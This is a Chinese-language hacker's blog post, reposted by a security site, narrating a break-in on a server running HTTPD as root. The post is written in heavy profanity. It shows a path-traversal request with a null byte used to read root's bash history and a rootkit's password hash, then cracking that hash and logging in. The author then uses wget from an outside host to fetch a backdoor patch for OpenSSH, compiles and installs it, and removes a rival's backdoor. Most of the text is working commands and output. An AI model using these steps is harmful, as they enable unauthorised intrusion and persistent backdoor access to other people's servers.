Yaseng 发了个包含给我 ROOT权限运行与HTTPD 如下图
傻逼 草拟吗的嫩B 什么J8管理员 ROOT权限的HTTPD? 这不明摆着找日吗? 草拟吗B的傻逼
打算破HASH 没CPU GUP
好吧 这傻逼货 继续看 NAMP扫了下 我了个擦 貌似有个傻逼黑客装个后门
啃跌了 什么年代了 还用sshd v1 你特么不是丢人吗?? 链接测试
- brk<~> $ ssh root@xxoo -1 # 22端口的SSH
- Protocol major versions differ: 1 vs. 2
- brk<~> $ ssh root@xxoo -p 2010 -1 # 2012端口的SSH 低级版本 怀疑后门
- root@xxoo’s password:
估计是mafix SSH backdoor 下载了围观下
http://lucky.fuzzexp.org/file/r00tk1t/mafix.tar_shit.gz
看到SSHDIR=/lib/libsh.so 包含读了下 果然是这个后门
下面确定了 找密码吧~~
首先看ROOT的日志
- GET /sc8/photodownload?filepath=../../../../../../../../../../../root/.bash_history%00.html HTTP/1.1
读了下 找不到 估计被-c了 
分析ROOTKIT的源代码 看看密码如何处理的
- brk<~/Desktop/ddrk> $ head setup
- #!/bin/bash
- ##########define variables##########
- DEFPASS=123456
- DEFPORT=43958
- BASEDIR=
pwd
- SSHDIR=/lib/libsh.so
- HOMEDIR=/usr/lib/libsh
变量是 DEFPASS
查找
- brk<~/Desktop/ddrk> $ cat setup | grep DEFPASS
- DEFPASS=123456
- echo “No Password Specified, using default – $DEFPASS”
- echo -n $DEFPASS|md5sum > /etc/sh.conf
- brk<~/Desktop/ddrk> $
村在了 /etc/sh.conf MD5加密 读一下 果然出来了
你妈个BB 接着MD5 解密 。。。
成功登录
接下来 删除黑客的后门 留我自己的后门 如下 安装OPENSSH的吧。。
- [root@SH-crew:/root]# ssh -v
- OpenSSH_4.3p2, OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008
- usage: ssh [-1246AaCfgkMNnqsTtVvXxY] [-b bind_address] [-c cipher_spec]
- [-D [bind_address:]port] [-e escape_char] [-F configfile]
- [-i identity_file] [-L [bind_address:]port:host:hostport]
- [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
- [-R [bind_address:]port:host:hostport] [-S ctl_path]
- [-w tunnel:tunnel] [user@]hostname [command]
- [root@SH-crew:/root]#
下载源代码。。
- [root@SH-crew:/root]# cd /tmp/
- [root@SH-crew:/tmp]# mkdir …
- [root@SH-crew:/tmp]# cd …
- [root@SH-crew:/tmp/…]# wget http://64studio.hivelocity.net/apt/pool/main/o/openssh/openssh_4.3p2.orig.tar.gz
- [root@SH-crew:/tmp/…]# tar xf openssh_4.3p2.orig.tar.gz
- [root@SH-crew:/tmp/…]# cd openssh-4.3p2/
- [root@SH-crew:/tmp/…/openssh-4.3p2]# wget http://lucky.fuzzexp.org/file/r00tk1t/openssh-5.5p1.patch/sshbd5.5p1.diff
- [root@SH-crew:/tmp/…/openssh-4.3p2]# patch < sshbd5.5p1.diff
- patching file auth.c
- Hunk #1 succeeded at 243 (offset -28 lines).
- patching file auth-passwd.c
- Hunk #1 succeeded at 113 (offset -9 lines).
- patching file canohost.c
- Hunk #1 succeeded at 60 (offset -18 lines).
- patching file includes.h
- Hunk #1 succeeded at 211 (offset 39 lines).
- patching file sshconnect2.c
- Hunk #1 succeeded at 736 with fuzz 2 (offset -80 lines).
- patching file sshlogin.c
- Hunk #1 succeeded at 112 (offset -21 lines).
- [root@SH-crew:/tmp/…/openssh-4.3p2]#
接下来编辑了下密码 和SSH登录登出的记录文件 编译 
- [root@SH-crew:/tmp/…/openssh-4.3p2]# ./configure –prefix=/usr –sysconfdir=/etc/ssh
- [root@SH-crew:/tmp/…/openssh-4.3p2]# make && make install
重启 退出 登录SSH
- [root@SH-crew:/tmp/…/openssh-4.3p2]# nano /etc/ssh/sshd_config
- [root@SH-crew:/tmp/…/openssh-4.3p2]# nano /etc/ssh/ssh_config
- [root@SH-crew:/tmp/…/openssh-4.3p2]# /etc/init.d/sshd restart
- [root@SH-crew:/tmp/…/openssh-4.3p2]exit
然后登录 22 输入后门密码Helenv5
把傻逼黑客的后门删除了 哈哈哈
- [root@viewjpkc libsh]# chmod -R 000 *
- [root@viewjpkc libsh.so]# chmod -R 000 *
吧端口封了
- [root@viewjpkc libsh]# iptables -I INPUT -j DROP -p tcp –dport 2010
- [root@viewjpkc libsh]# iptables-save
测试链接
- brk<~/files/ssh> $ nc -vv xxxxxxxxxxx 2010
- Connection to xxoo 2010 port [tcp/search] succeeded!
- SSH-1.5-2.0.13
- ^C
- brk<~/files/ssh> $ nc -vv xxxxxx 2010
链接不了了
- [root@viewjpkc libsh]# modprobe -r ehci-hcd
最后 发张图。。。。
link:http://fuzzexp.org/check_rk.html
本文由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请注明出处。
